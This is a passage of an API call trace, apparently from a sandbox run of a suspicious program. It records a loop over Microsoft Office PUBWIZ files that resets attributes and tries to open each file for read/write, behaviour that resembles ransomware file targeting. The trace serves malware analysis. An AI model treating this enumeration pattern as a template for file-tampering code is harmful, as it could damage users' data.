VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.DPV", dwFileAttributes=0x80) returned 0 [0137.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbox.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.683] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.683] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.683] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.683] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.683] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.XML", dwFileAttributes=0x80) returned 0 [0137.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBOX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbox.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.684] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.684] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.684] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.684] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.DPV", dwFileAttributes=0x80) returned 0 [0137.685] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgad.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.685] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.685] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.685] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.685] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.XML", dwFileAttributes=0x80) returned 0 [0137.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGAD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.686] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.686] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.686] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.686] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.DPV", dwFileAttributes=0x80) returned 0 [0137.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgatnget.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.686] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.686] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.686] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.686] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.XML", dwFileAttributes=0x80) returned 0 [0137.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGATNGET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgatnget.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.687] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.687] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.687] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.687] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.687] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.DPV", dwFileAttributes=0x80) returned 0 [0137.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgbarbll.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.687] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.687] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.688] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.688] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.XML", dwFileAttributes=0x80) returned 0 [0137.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBARBLL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgbarbll.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.688] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.688] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.688] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.688] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.DPV", dwFileAttributes=0x80) returned 0 [0137.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgborder.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.689] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.689] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.689] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.689] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.689] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.XML", dwFileAttributes=0x80) returned 0 [0137.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBORDER.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgborder.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.690] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.690] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.690] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.DPV", dwFileAttributes=0x80) returned 0 [0137.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgboxes.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.690] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.690] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.690] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.690] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.690] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.XML", dwFileAttributes=0x80) returned 0 [0137.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGBOXES.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgboxes.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.691] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.691] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.691] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.691] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.DPV", dwFileAttributes=0x80) returned 0 [0137.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcal.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.691] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.691] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.691] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.691] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.XML", dwFileAttributes=0x80) returned 0 [0137.692] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCAL.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcal.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.692] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.692] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.692] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.692] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.692] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.DPV", dwFileAttributes=0x80) returned 0 [0137.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.693] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.693] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.693] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.693] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.694] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML", dwFileAttributes=0x80) returned 0 [0137.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.695] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.695] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.695] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.695] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML", dwFileAttributes=0x80) returned 0 [0137.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCINFO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcinfo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.696] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.696] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.696] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.698] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.698] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.DPV", dwFileAttributes=0x80) returned 0 [0137.698] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcoupon.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.698] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.698] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.698] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.698] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.XML", dwFileAttributes=0x80) returned 0 [0137.699] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCOUPON.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgcoupon.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.699] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.699] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.699] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.699] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.699] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.DPV", dwFileAttributes=0x80) returned 0 [0137.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgdots.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.700] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.700] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.700] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.700] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.XML", dwFileAttributes=0x80) returned 0 [0137.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGDOTS.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgdots.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.700] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.701] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.701] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.701] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGHEADING.XML", dwFileAttributes=0x80) returned 0 [0137.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGHEADING.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgheading.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.701] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.701] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.701] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.701] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.701] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.DPV", dwFileAttributes=0x80) returned 0 [0137.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglinacc.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.702] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.702] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.702] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.702] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.XML", dwFileAttributes=0x80) returned 0 [0137.702] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLINACC.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglinacc.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.702] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.702] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.702] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.702] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.DPV", dwFileAttributes=0x80) returned 0 [0137.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglogo.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.703] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.703] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.703] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.703] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.703] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.XML", dwFileAttributes=0x80) returned 0 [0137.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGLOGO.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dglogo.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.704] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.704] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.704] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.704] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.704] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMAIN.XML", dwFileAttributes=0x80) returned 0 [0137.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMAIN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmain.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.705] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.705] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.705] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.705] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.DPV", dwFileAttributes=0x80) returned 0 [0137.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmarq.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.705] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.705] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.705] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.705] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.705] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.XML", dwFileAttributes=0x80) returned 0 [0137.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMARQ.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmarq.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.706] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.706] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.706] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.706] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.706] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMASTHD.DPV", dwFileAttributes=0x80) returned 0 [0137.707] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGMASTHD.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgmasthd.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.707] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.707] VirtualFree (lpAddress=0x350000, dwSize=0x0, 